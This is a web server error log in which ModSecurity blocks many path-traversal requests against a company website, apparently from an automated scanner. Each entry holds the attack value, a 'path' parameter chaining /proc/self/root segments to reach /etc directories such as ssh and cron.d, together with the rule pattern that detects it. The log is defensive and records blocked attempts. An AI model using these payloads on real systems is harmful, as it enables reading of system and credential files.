[Tue Mar 17 09:32:17.806030 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:57988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ0dCmCSWTlPouqorMDAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:18.372558 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.46:48992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ0geiSKl8TjouI-YCUAAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:20.279164 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.243.203:58002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ1JDEJR9VXonE_-1PDQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:20.739951 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.241.46:60568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ1JDEJR9VXonE_-1PDgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:22.024992 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:60584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ1tCmCSWTlPouqorMDQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:22.639141 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:56612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ1geiSKl8TjouI-YCUwAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:23.217836 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:60598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ16BJNF7axNlVR0X8jQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:23.910631 2026] [:error] [pid 2553:tid 140411590858496] [client 74.7.243.203:56616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ1_0Bec_B9OkZP_i9JQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:25.081165 2026] [:error] [pid 2553:tid 140411607643904] [client 74.7.243.203:56618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ2f0Bec_B9OkZP_i9JwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:26.396009 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.243.203:56624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ2tCmCSWTlPouqorMDgAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:26.639769 2026] [:error] [pid 2553:tid 140411632822016] [client 74.7.241.46:60608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ2v0Bec_B9OkZP_i9KgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:27.553950 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:56634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ29CmCSWTlPouqorMEAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:28.010998 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.46:60622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3AeiSKl8TjouI-YCVAAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:28.837880 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:56644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3O82sZHvlq4xgHrCggAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:29.208087 2026] [:error] [pid 1731:tid 140411599251200] [client 74.7.241.46:33568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3Qb2qCuy5irgBMjJQgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:30.185208 2026] [:error] [pid 1210:tid 140411632822016] [client 74.7.243.203:44868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3lKJy4A1bGlmj9BVxQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:31.443060 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.243.203:44880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3-82sZHvlq4xgHrChAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:31.499227 2026] [:error] [pid 2553:tid 140411699963648] [client 74.7.241.46:33582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ3_0Bec_B9OkZP_i9LwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:33.911301 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:44888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ4ZqmL8PQht4WJFlH_wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:35.127549 2026] [:error] [pid 1731:tid 140411674785536] [client 74.7.241.46:33586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ4wb2qCuy5irgBMjJRgAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:32:35.283914 2026] [:error] [pid 2553:tid 140411616036608] [client 74.7.243.203:44904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ4_0Bec_B9OkZP_i9MQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:36.448369 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.241.46:33598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 